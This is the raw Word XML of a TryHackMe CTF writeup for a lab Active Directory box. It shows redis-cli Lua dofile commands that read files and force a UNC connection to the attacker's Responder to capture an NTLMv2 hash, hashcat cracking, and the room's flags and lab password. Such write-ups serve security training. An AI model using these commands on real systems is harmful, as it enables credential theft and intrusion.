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7629" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1440" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
        </w:rPr>
        <w:t>VulnNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
        </w:rPr>
        <w:t>: Active</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6544D816" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> CTF Writeup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D22B1FD" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="800"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>Exploitation  ·</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">  NTLM </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>Capture  ·</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>PrintNightmare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CVE-2021-1675)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3"/>
        <w:gridCol w:w="4797"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C87297" w14:paraId="7CE7F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0343" w14:textId="77777777" w:rsidR="00C87297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FEB4" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TryHackMe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="34E86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2ADA" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Room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D08" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VulnNet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>: Active</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="3BE509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6F10" w14:textId="77777777" w:rsidR="00C87297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A0E4" w14:textId="77777777" w:rsidR="00C8729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C87297" w14:paraId="23391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9438" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>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1764" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Windows (Active Directory)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="69BC1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05D5" w14:textId="77777777" w:rsidR="00C87297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A7E6" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tusharmumbre</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="582405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7509" w14:textId="77777777" w:rsidR="00C87297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DA8C" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>March 30, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="68E13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D4C4" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Streak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582B" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>102 Days 🔥</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="7DC86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35CE" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Points Earned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D81B" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D1BFFB1" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="062CE938" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03FBBA80" w14:textId="77777777" w:rsidR="00C8729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C07F0C9" wp14:editId="684B94CE">
            <wp:extent cx="6378823" cy="52197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47" cy="52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9F8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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Room Completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710A0525" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28744591" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Room Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9D9F86" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VulnNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Active simulates a real-world Windows Active Directory environment where a series of misconfigurations allow a completely unauthenticated attacker to achieve full SYSTEM-level compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFD94F9" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The attack chain demonstrates several techniques commonly used in real penetration tests and red team engagements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1748DE44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Unauthenticated Redis instance — file read and credential theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618386F5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NTLM hash capture via Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDD3DF2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Offline password cracking with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B9E37B0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SMB enumeration and scheduled task abuse for initial access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCB65C7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PrintNightmare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (CVE-2021-1675) for privilege escalation to SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390C7376" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C872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297" w14:paraId="45A3E9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B64C90" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t xml:space="preserve">🚩 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t xml:space="preserve">user.txt  </w:t>
            </w:r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THM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{3eb176aee96432d5b100bc93580b291e}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C4F6394" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C872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297" w14:paraId="7EF9D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C099E" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t xml:space="preserve">🚩 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t xml:space="preserve">system.txt  </w:t>
            </w:r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THM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{d540c0645975900e5bb9167aa431fc9b}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52EBB180" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="37055A6F" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step 1 — Recon: Nmap Full Port Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636B337B" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>A full TCP port scan was performed against the target to discover all open services. The -p- flag ensures all 65,535 ports are scanned — default scans miss higher ports where critical services like Redis are often found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A2E9C0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-T4 -p- 10.49.155.183</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEE2C16" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="721E30D0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7226751" wp14:editId="7DE28FF9">
            <wp:extent cx="8334375" cy="2371725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="56115081" name="Picture 56115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43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030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2 — Nmap scan initiated on target 10.49.155.183</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C651865" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D65B50F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7BA45E7" wp14:editId="4018B843">
            <wp:extent cx="7962900" cy="3209925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1585769074" name="Picture 1585769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B62D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3 — Nmap results showing open ports including Redis on 6379</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5C98E4" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="516233AD" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Key findings from the scan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F654D50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Port 6379 — Redis 2.8.2402 (unauthenticated) ← Primary attack vector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C53CB42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Port 445 — SMB with signing enabled (relay attacks ruled out)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A96A9C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Port 464 — kpasswd5 confirms Active Directory environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6BAF05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Port 135/139 — Windows RPC/NetBIOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1126568B" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D2D290" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2 — Redis Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E49D67" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Redis 2.8.2402 was found running with no authentication required. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-tools package was installed on the attack machine and the instance was enumerated directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D775002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-tools -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25454388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-cli -h 10.49.155.183 -p 6379 info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3C73F9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-cli -h 10.49.155.183 -p 6379 config get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dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="433A00CE" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="233DC7AA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F61BA3C" wp14:editId="333245BF">
            <wp:extent cx="7743825" cy="1533525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1970169565" name="Picture 1970169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7CA8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 — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>redis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-cli not installed; installing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>redis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B7FFD6" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24DEA789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AAA81D6" wp14:editId="6A43B339">
            <wp:extent cx="7581900" cy="819150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="280359765" name="Picture 280359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0BD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5 — Successfully connected to Redis with no password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53993E74" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38FDC008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23F92A9" wp14:editId="1BEA2807">
            <wp:extent cx="7734300" cy="1295400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="846231224" name="Picture 84623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F37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6 — config get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> reveals Windows username: enterprise-security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6668CA" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02CEF84F" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Critical finding: The Redis installation directory path leaked a valid Windows username:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5918A9E4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C:\Users\enterprise-security\Downloads\Redis-x64-2.8.2402</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223A7CB4" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CECCF3" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step 3 — user.txt via Lua Sandbox Escape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70994BA9" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Redis 2.8 permits Lua scripting via the eval command. Lua's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>dofile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) function reads files from the filesystem. While it cannot execute a text file as valid Lua code, the file contents leak inside the resulting error message — a classic information disclosure via error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F873E0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-cli -h 10.49.155.183 -p 6379 eval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dofile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('C:/Users/enterprise-security/Desktop/user.txt')" 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D823E5B" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789EE4B3" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The flag value appeared inside the error message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B89759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(error) ERR Error running script: malformed number near '3eb176aee96432d5b100bc93580b291e'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E92EF98" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C872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297" w14:paraId="7323A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E9840" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t xml:space="preserve">🚩 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t xml:space="preserve">user.txt  </w:t>
            </w:r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THM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{3eb176aee96432d5b100bc93580b291e}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3ACCE102" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60E0F027" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3069ED9F" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step 4 — NTLM Hash Capture via Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACDC45A" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Redis can be instructed to open files via UNC paths (\\server\share). When Windows attempts to access a network share, it automatically sends NTLMv2 authentication credentials. By running Responder as a fake SMB server and triggering Redis to connect, the NTLM hash for enterprise-security was captured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F2977F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responder -I ens5 -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dvw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5FAAC511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-cli -h 10.49.155.183 -p 6379 eval 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dofile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('//10.49.107.122/anything')" 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3557069A" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A50B39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10E44BA" wp14:editId="1B6F3F2E">
            <wp:extent cx="7791450" cy="2362200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1832232318" name="Picture 183223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7C45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7 — Network interface ens5 identified with IP 10.49.107.122</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482858DA" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EE591B7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5D7969D" wp14:editId="0AB9CE48">
            <wp:extent cx="7839075" cy="3219450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1524528147" name="Picture 1524528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F03F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8 — Responder captures NTLMv2 hash for VULNNET\enterprise-security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF487C4" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33092CBE" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Note: Responder must be running BEFORE triggering the Redis UNC path request. If started after, Windows returns a connection refused and no hash is captured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020633E4" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43017484" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 5 — Hash Cracking with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="29DFB8C2" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The captured NTLMv2 hash was saved to a file and cracked offline using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with the rockyou.txt wordlist. Mode -m 5600 specifies NetNTLMv2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BFBBED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hashcat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-m 5600 -w 3 hash.txt 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/share/wordlists/rockyou.txt --force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04993796" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04F629B9" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The password was cracked in under 8 seconds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AB4278" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C872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7"/>
        <w:gridCol w:w="6333"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C87297" w14:paraId="5512D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F280" w14:textId="77777777" w:rsidR="00C87297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EA8C" w14:textId="77777777" w:rsidR="00C87297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87297" w14:paraId="6203A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098E" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr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5A36" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>enterprise-security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="7CCEA7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0547" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000"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52AD" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sand_0873959498</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="163DF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3A2B" w14:textId="77777777" w:rsidR="00C87297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3FCB" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
